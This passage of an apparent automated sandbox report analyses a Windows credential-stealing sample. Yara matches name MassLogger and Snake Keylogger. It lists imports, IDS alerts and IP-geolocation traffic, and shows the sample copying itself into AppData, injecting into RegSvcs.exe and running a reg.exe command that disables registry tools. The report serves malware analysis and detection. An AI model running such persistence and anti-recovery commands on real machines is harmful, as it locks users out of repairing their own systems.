IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:10:52.299880+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49701	132.226.247.73	80	TCP
2025-01-11T04:11:02.674905+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49749	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:10:50.310058117 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:10:50.314979076 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:10:50.315068960 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:10:50.315371037 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:10:50.321234941 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:10:52.037097931 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:10:52.044291973 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:10:52.049176931 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:10:52.257416964 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:10:52.299880028 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:10:52.370300055 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:52.370364904 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:52.372294903 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:52.479832888 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:52.479866028 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:52.972798109 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:52.972891092 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:53.148180962 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:53.148278952 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:53.148768902 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:53.190627098 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:53.583784103 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:53.627335072 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:53.699894905 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:53.699979067 CET	443	49702	104.21.48.1	192.168.2.7
Jan 11, 2025 04:10:53.700047016 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:10:53.707149982 CET	49702	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:01.661520004 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:01.666419029 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:01.666487932 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:01.667036057 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:01.671916962 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:02.338638067 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:02.393770933 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:02.423703909 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:02.428693056 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:02.632529020 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:02.658075094 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:02.658113956 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:02.658176899 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:02.662434101 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:02.662472963 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:02.674905062 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:11:03.161065102 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.161150932 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:03.163044930 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:03.163062096 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.163470984 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.206285000 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:03.217545033 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:03.259334087 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.338023901 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.338191032 CET	443	49756	104.21.48.1	192.168.2.7
Jan 11, 2025 04:11:03.338262081 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:03.342006922 CET	49756	443	192.168.2.7	104.21.48.1
Jan 11, 2025 04:11:57.257472038 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:11:57.257633924 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:12:07.633486032 CET	80	49749	132.226.247.73	192.168.2.7
Jan 11, 2025 04:12:07.633677006 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:12:32.347744942 CET	49701	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:12:32.352619886 CET	80	49701	132.226.247.73	192.168.2.7
Jan 11, 2025 04:12:42.726638079 CET	49749	80	192.168.2.7	132.226.247.73
Jan 11, 2025 04:12:42.731606960 CET	80	49749	132.226.247.73	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:10:50.296175003 CET	58182	53	192.168.2.7	1.1.1.1
Jan 11, 2025 04:10:50.304205894 CET	53	58182	1.1.1.1	192.168.2.7
Jan 11, 2025 04:10:52.361988068 CET	52230	53	192.168.2.7	1.1.1.1
Jan 11, 2025 04:10:52.369035959 CET	53	52230	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:10:50.296175003 CET	192.168.2.7	1.1.1.1	0x5b05	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.361988068 CET	192.168.2.7	1.1.1.1	0x47d1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:50.304205894 CET	1.1.1.1	192.168.2.7	0x5b05	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:10:52.369035959 CET	1.1.1.1	192.168.2.7	0x47d1	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	132.226.247.73	80	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:10:50.315371037 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 04:10:52.037097931 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:10:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 04:10:52.044291973 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 04:10:52.257416964 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:10:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49749	132.226.247.73	80	8068	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:11:01.667036057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 04:11:02.338638067 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:11:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 04:11:02.423703909 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 04:11:02.632529020 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:11:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	104.21.48.1	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:10:53 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 03:10:53 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:10:53 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1879842 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKAlLCqM2%2Bxds4%2FCub49TxC3XmML2lxcbWPgIyRT2WKbBSD9%2FCOP2VPH6fuNxaD43fVFPPjyPXyByVZnWREc%2BsO5IdOCWEonMFX%2B8pB8g6x1InsieORUzUFOdL45dzMFF%2B7C%2BeU3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001b761295e43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1827284&cwnd=226&unsent_bytes=0&cid=061bf015cc9c86bc&ts=744&x=0"
2025-01-11 03:10:53 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49756	104.21.48.1	443	8068	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:11:03 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 03:11:03 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 03:11:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1879852 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H8U2Sfx2IeSgh%2FVf7zZjuCWomaV1GQ2u942pqj8WqZ60KeNsKAY%2FvvutIJigSM7Tg1DEHRxeW6TjbpaelagG0GHx%2FuzTfEiHR%2F4%2Fzb0RS9EOzFuepzB2oZhKb8eBWtHEqXJz%2FZzJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001b79d6877c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1679&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1739130&cwnd=228&unsent_bytes=0&cid=d71cd6bc3ffb9c1f&ts=183&x=0"
2025-01-11 03:11:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	1
Start time:	22:10:46
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\tNXl4XhgmV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tNXl4XhgmV.exe"
Imagebase:	0x180000
File size:	985'600 bytes
MD5 hash:	5A08CE9FCE5F6482D2A785E0117370BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:10:46
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\ghauts\vaccinatory.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tNXl4XhgmV.exe"
Imagebase:	0x7c0000
File size:	985'600 bytes
MD5 hash:	5A08CE9FCE5F6482D2A785E0117370BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:10:47
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tNXl4XhgmV.exe"
Imagebase:	0x9c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2538888760.0000000002F37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:10:52
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Imagebase:	0x970000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:10:52
